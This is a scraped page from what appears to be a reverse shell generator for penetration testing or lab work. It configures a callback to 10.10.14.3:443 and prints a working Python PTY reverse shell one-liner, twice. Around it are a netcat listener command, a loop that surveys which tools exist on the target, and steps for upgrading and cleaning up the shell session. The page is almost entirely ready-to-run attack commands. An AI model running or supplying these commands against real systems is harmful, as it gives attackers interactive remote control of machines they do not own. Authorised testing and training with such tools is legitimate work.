Skip to content
reverseshell

Reverse Shell Builder

Callback endpoint
10.10.14.3:443
IP
Port

443 and 80 clear most outbound firewalls; uncommon high ports are often blocked.

Listener command
Command to run
$nc -lvnp 443
Target profile
Target OS
CPU architecture
Outbound access
Tools available on target

Leave tools unselected when you are not sure what exists on the target.

Not sure? Run this on the target to list available tools and their full paths:

$for b in sh bash python3 python perl ruby node php nc ncat socat openssl curl wget awk; do p=$(command -v "$b" 2>/dev/null || ls /usr/bin/$b /bin/$b /usr/local/bin/$b /usr/sbin/$b /sbin/$b 2>/dev/null | head -1); [ -n "$p" ] && echo "$b: $p"; done

Mode
Runtime / tool
Shell path
High fit 100%Fully interactive — a TTY on arrival.
Technique10 / 138
Reverse TCP callbackmulti

Python 3 PTY · multi · Python 3 reverse shell that spawns the selected shell through pty.

Transform

Only compatible transforms are shown.

Command output

$python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.3",443));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

Listener

$nc -lvnp 443
+ Don't have it? Install the listener toolsudo apt install netcat-openbsd # macOS: brew install netcat

Session upgrade
Upgrade recipe

Replace the fixed size with your terminal dimensions: stty rows $(tput lines) columns $(tput cols)

Upgrade steps
$python3 -c 'import pty; pty.spawn("/bin/sh")' || python -c 'import pty; pty.spawn("/bin/sh")'
$Ctrl-Z
$stty raw -echo; fg
$reset
$export TERM=xterm-256color
$stty rows 40 columns 120
Session cleanup
Cleanup helper
Cleanup steps
$export SHELL=/bin/sh
$export TERM=xterm-256color
$export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH
$alias ll='ls -la'
$ python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.3",443));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'